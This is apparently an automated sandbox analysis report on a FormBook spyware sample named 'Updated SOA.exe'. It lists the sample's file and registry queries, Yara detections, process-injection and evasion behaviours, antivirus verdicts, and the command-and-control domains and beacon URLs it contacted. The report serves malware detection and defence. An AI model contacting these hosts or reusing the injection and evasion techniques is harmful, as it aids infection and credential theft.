          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Updated SOA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3bb6150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Updated SOA.exe.3b99930.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 486924 Sample: Updated SOA.exe Startdate: 21/09/2021 Architecture: WINDOWS Score: 100 41 www.newstodayupdate.com 2->41 43 newstodayupdate.com 2->43 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 11 other signatures 2->57 11 Updated SOA.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\oydxFbGhGlh.exe, PE32 11->33 dropped 35 C:\Users\...\oydxFbGhGlh.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\...\tmp14E0.tmp, XML 11->37 dropped 39 C:\Users\user\AppData\...\Updated SOA.exe.log, ASCII 11->39 dropped 71 Injects a PE file into a foreign processes 11->71 15 Updated SOA.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 Queues an APC in another process (thread injection) 15->79 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 45 connect.shopbase.com 185.33.94.22, 49784, 80 XTOMxTomEU United Kingdom 20->45 47 starsspell.com 70.40.216.229, 49802, 80 UNIFIEDLAYER-AS-1US United States 20->47 49 11 other IPs or domains 20->49 59 System process connects to network (likely due to code injection or exploit) 20->59 61 Performs DNS queries to domains with low reputation 20->61 26 cmmon32.exe 20->26         started        signatures11 process12 signatures13 63 Self deletion via cmd delete 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 Maps a DLL or memory area into another process 26->67 69 Tries to detect virtualization through RDTSC time measurements 26->69 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Updated SOA.exe32%VirustotalBrowse
          Updated SOA.exe24%ReversingLabsWin32.Spyware.Noon
          Updated SOA.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe24%ReversingLabsWin32.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.Updated SOA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          newstodayupdate.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.typography.netFGl0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sunshinefamilysupport.com/b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/gl&0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ul0%Avira URL Cloudsafe
          http://www.carts-amazon.com/b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comsiv/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/=lP0%Avira URL Cloudsafe
          http://en.wikipVl0%Avira URL Cloudsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Ll0%Avira URL Cloudsafe
          www.thesewhitevvalls.com/b2c0/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.newstodayupdate.com/b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/nl-n/l~0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comgrita0%URL Reputationsafe
          http://www.typography.netom0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/r-t0%Avira URL Cloudsafe
          http://www.typography.net0%URL Reputationsafe
          http://www.fontbureau.comB.TTF0%URL Reputationsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
          http://www.starsspell.com/b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.carterandcone.com;0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/Vm0%Avira URL Cloudsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.carterandcone.como.0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0.0%Avira URL Cloudsafe
          http://www.fontbureau.com=0%Avira URL Cloudsafe
          http://www.fontbureau.comMS0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fonts.comn-m;0%Avira URL Cloudsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.carterandcone.comalY0%Avira URL Cloudsafe
          http://www.loccssol.store/b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/gl&0%Avira URL Cloudsafe
          http://www.kutahyaescortbayanlarim.xyz/b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.brightlifeprochoice.com/b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.typography.netute0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0;0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.comyrl0%Avira URL Cloudsafe
          http://www.fontbureau.comW.TTF&li0%Avira URL Cloudsafe
          http://www.urwpp.dex0%Avira URL Cloudsafe
          http://www.fontbureau.comdVm0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
          http://www.fontbureau.comaul0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/s-e0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
          http://www.emilfaucets.com/b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.fontbureau.comT.TTF4l0%Avira URL Cloudsafe
          http://www.typography.netayl0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/~l0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.comttaVm0%Avira URL Cloudsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//MS0%Avira URL Cloudsafe
          http://www.invetorsbank.com/b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4X0%Avira URL Cloudsafe
          http://www.carterandcone.comTCt0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/kanLl0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.emilfaucets.com
          		23.92.26.10
          		truetrue
            		unknown
            www.invetorsbank.com
            		185.53.177.12
            		truetrue
              		unknown
              newstodayupdate.com
              		34.102.136.180
              		truefalseunknown
              www.kutahyaescortbayanlarim.xyz
              		104.21.2.184
              		truetrue
                		unknown
                www.brightlifeprochoice.com
                		172.67.169.11
                		truetrue
                  		unknown
                  starsspell.com
                  		70.40.216.229
                  		truetrue
                    		unknown
                    connect.shopbase.com
                    		185.33.94.22
                    		truetrue
                      		unknown
                      carts-amazon.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        sunshinefamilysupport.com
                        		184.168.131.241
                        		truetrue
                          		unknown
                          www.starsspell.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.sunshinefamilysupport.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.thesewhitevvalls.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.newstodayupdate.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.loccssol.store
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.carts-amazon.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.sunshinefamilysupport.com/b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carts-amazon.com/b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4Xfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.thesewhitevvalls.com/b2c0/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.newstodayupdate.com/b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4Xfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.starsspell.com/b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.loccssol.store/b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kutahyaescortbayanlarim.xyz/b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.brightlifeprochoice.com/b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.emilfaucets.com/b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.invetorsbank.com/b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4Xtrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.fontbureau.com/designers/;Updated SOA.exe, 00000000.00000003.220133959.0000000005A5E000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.typography.netFGlUpdated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/?Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers?Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/gl&Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/ulUpdated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tiro.comUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comsiv/Updated SOA.exe, 00000000.00000003.220153841.0000000005A44000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/=lPUpdated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://en.wikipVlUpdated SOA.exe, 00000000.00000003.214355579.0000000005A43000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designersUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comessedUpdated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htm/Updated SOA.exe, 00000000.00000003.222547008.0000000005A22000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.goodfont.co.krUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comUpdated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/LlUpdated SOA.exe, 00000000.00000003.217945540.0000000005A44000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designersPHUpdated SOA.exe, 00000000.00000003.220238801.0000000005A5E000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sajatypeworks.comUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netDUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cn/cTheUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/nl-n/l~Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmUpdated SOA.exe, 00000000.00000003.222547008.0000000005A22000.00000004.00000001.sdmp, Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fontfabrik.comUpdated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comgritaUpdated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netomUpdated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/r-tUpdated SOA.exe, 00000000.00000003.218881873.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.typography.netUpdated SOA.exe, 00000000.00000003.214865561.0000000005A3B000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comB.TTFUpdated SOA.exe, 00000000.00000003.221024966.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comcomUpdated SOA.exe, 00000000.00000003.220744148.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/0Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.com;Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
